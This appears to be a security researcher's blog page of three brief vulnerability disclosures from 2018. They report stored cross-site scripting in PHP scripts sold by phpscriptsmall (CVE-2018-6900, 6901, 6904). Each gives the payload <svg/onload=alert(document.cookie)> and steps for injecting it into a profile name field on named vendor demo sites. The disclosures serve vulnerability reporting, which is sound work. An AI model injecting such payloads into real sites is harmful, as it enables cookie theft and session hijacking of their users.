CVE

Website Broker Script – Stored XSS

hacksayanLeave a comment
############################################################################
# Exploit Title: Website Broker Script – Stored XSS
# Date: 11.02.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/website-broker-script/
# Category: Web Application
# Version: 3.0.6
# Tested on: Windows 10
# CVE: CVE-2018-6900
############################################################################

 

Proof of Concept
=================
URL: https://www.phpscriptsmall.com/product/website-broker-script/
Attack Vector : Last Name
Payload : <svg/onload=alert(document.cookie)>

Reproduction Steps:
——————————
1. Access the above URL
2. Click on “User Demo:
3. Application will be redirected to http://74.124.215.220/~clienemo/prabha/flippa-clone/
4. Go to “Register” and Create a New User
5. Now Login into the application and Click on : My Account ”
6. Click on “Edit Profile” -> Select “Last Name” field and inject <svg/onload=alert(document.cookie)>
7. Persistent XSS will be executed.

Image Sharing Script – Stored XSS

hacksayanLeave a comment
############################################################################

# Exploit Title: Image Sharing Script – Stored XSS

# Date: 11.02.2018

# Exploit Author: Sayan Chatterjee

# Follow upcoming blog – hacksayan.com

# Vendor Homepage: https://www.phpscriptsmall.com/

# Software Link: https://www.phpscriptsmall.com/product/image-sharing-script/

# Category: Web Application

# Version: 1.3.3

# Tested on: Windows 10

# CVE: CVE-2018-6901

############################################################################
Proof of Concept
=================
Attack Vector : Full Name
Payload : <svg/onload=alert(document.cookie)>
Reproduction Steps:
——————————
1. Access the above URL
2. Click on “User Demo:
3. The application will be redirected to http://fxwebsolution.com/demo/jansi/stock-free-snap/
4. Go to “Register” and Create a New User
5. Now log in into the application and Click on: Profile “
6. Click on “Edit Profile” -> Select “Full Name” field and inject <svg/onload=alert(document.cookie)>
7. Persistent XSS will be executed.

Car Rental Script – Stored XSS

hacksayanLeave a comment

############################################################################
# Exploit Title: Car Rental Script – Stored XSS
# Date: 11.02.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/
# Category: Web Application
# Version: 2.0.8
# Tested on: Windows 10
# CVE: CVE-2018-6904
############################################################################

Proof of Concept
=================
URL: https://www.phpscriptsmall.com/product/car-rental-script/
Attack Vector : User Name
Payload : <svg/onload=alert(document.cookie)>

Reproduction Steps:
——————————
1. Access the above URL
2. Click on “User Demo”
3. Application will be redirected to http://travelbookingscript.com/demo/taxibooking_new/index.php
4. Goto “Register” and Create a New User
5. Now Login into the application and Click on : My Account ”
6. Click on “Edit Profile” -> Select “User Name” and inject <svg/onload=alert(document.cookie)>
7. Persistent XSS will be executed.